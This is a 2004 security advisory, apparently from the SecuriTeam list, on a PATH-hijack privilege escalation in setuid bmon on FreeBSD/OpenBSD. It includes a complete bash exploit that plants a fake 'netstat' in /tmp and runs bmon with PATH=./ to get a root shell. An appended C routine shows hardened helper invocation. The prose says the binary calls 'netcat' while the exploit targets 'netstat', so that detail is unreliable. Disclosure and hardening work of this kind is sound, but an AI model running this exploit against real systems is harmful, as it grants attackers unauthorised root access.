
| Subject: | [UNIX] BMon Relative Path Privilege Escalation |
|---|---|
| Date: | 17 Oct 2004 15:55:15 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

BMon Relative Path Privilege Escalation
------------------------------------------------------------------------

SUMMARY

" <http://trash.net/~reeler/bmon/> Bmon is an interface bandwidth monitor using the curses library. It's able to compute and draw three types of diagrams (overview, graphical, and detailed). The overview diagram is a list of all interfaces including the rx/tx rates of each interface. The graphical diagram is a bar graph in ASCII. All diagrams are continuously updated."

When Bmon is installed SUID, a malicious attacker can override the default system path and execute arbitrary commands under root privileges.

DETAILS

Vulnerable Systems:
 * Bmon version lower than 1.2.1_2

When bmon is executed with the -n parameter it popen()s netcat but fails to provide an absolute path. Some BSDs are configured with ACLs that don't allow setuid files to run except those that are explicitly allowed, so creating a file called netcat that chmod's +s bash wouldn't work; bash needs to be run directly by bmon, which uses ncurses, so to get a usable shell we need to redirect stdout to stderr (stdout is closed) and restore the stty settings.

Exploit Code:
Presented below is a local exploit code for *BSD systems.

```bash
#!/usr/local/bin/bash
# Written by Idan Nahoum. idanna@bk.ru
# local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.
# when bmon is executed with the -n parameter it popen()s netcat
# but fails to provide an absolute path.
# some bsds are configured with acls that don't allow setuid files to
# run except those that are explicitly allowed, so creating a file called
# netcat that chmod's +s bash wouldn't work, bash needs to run directly by
# bmon which uses ncurses, so to get a useable shell we need to redirect
# stdout to stderr (stdout is closed), and restore the stty settings.
# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html

declare -r SPATH="${PATH}"
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g)
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"

echo "$0 [default: ${BMON_EXEC}]"
[ "$#" -gt "0" ] && BMON_EXEC="${1}"
[ -x "${BMON_EXEC}" ] || {
    echo "${BMON_EXEC} not found"
    exit
}

cd /tmp

# apparently bmon closes stdout, so we run a shell with stdout redirected
# to stderr.
cat > ./netstat <<EOF
${STTY_EXEC} ${STTY_SETTINGS}
PATH=${SPATH} /bin/sh 1>&2
EOF
/bin/chmod 755 ./netstat

echo "trying to exploit"
PATH=./ "${BMON_EXEC}" -n
```

ADDITIONAL INFORMATION

The information has been provided by <mailto:idanna@bk.ru> Idan Nahoum.
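As an added example that is not part of this advisory or of bmon's source, the C routine below shows how a setuid program can invoke a helper without the hazard described above: an absolute path, execve() instead of popen(), a fixed environment, and privileges dropped to the invoking user before the helper starts. The demo assumes /bin/echo exists.

```c
/* Added example, not bmon's code. The hazard in a setuid binary is
 *     FILE *f = popen("netstat -i", "r");
 * popen() hands the string to /bin/sh, which resolves the bare name through
 * the caller's PATH, and the caller owns PATH. The replacement execs an
 * absolute path with a fixed environment after dropping to the invoking
 * user's uid/gid, so neither PATH nor the privileged uid reaches the helper. */
#include <errno.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Runs abs_path with argv, privileges dropped, and copies up to bufsz-1 bytes
 * of its stdout into buf. Returns the child's exit status, or -1 (errno set)
 * when abs_path is not absolute or the child cannot be spawned. */
int run_helper(const char *abs_path, char *const argv[], char *buf, size_t bufsz)
{
    int p[2], status;
    size_t used = 0;
    ssize_t n;
    pid_t pid;
    if (abs_path == NULL || abs_path[0] != '/') { errno = EINVAL; return -1; }
    if (pipe(p) == -1) return -1;
    pid = fork();
    if (pid == -1) { close(p[0]); close(p[1]); return -1; }
    if (pid == 0) {                                   /* child */
        if (setgid(getgid()) == -1 || setuid(getuid()) == -1) _exit(127);
        if (dup2(p[1], STDOUT_FILENO) == -1) _exit(127);
        close(p[0]); close(p[1]);
        execve(abs_path, argv, SAFE_ENV);             /* no shell, no PATH search */
        _exit(127);
    }
    close(p[1]);
    while (used < bufsz - 1 && (n = read(p[0], buf + used, bufsz - 1 - used)) > 0)
        used += (size_t)n;
    buf[used] = '\0';
    close(p[0]);
    if (waitpid(pid, &status, 0) == -1) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demo: the bare name "echo" is refused, /bin/echo (assumed present) runs. */
int demo(char *buf, size_t bufsz)
{
    char *const argv[] = { "echo", "hardened", NULL };
    if (run_helper("echo", argv, buf, bufsz) != -1) return -2;
    return run_helper("/bin/echo", argv, buf, bufsz);
}
```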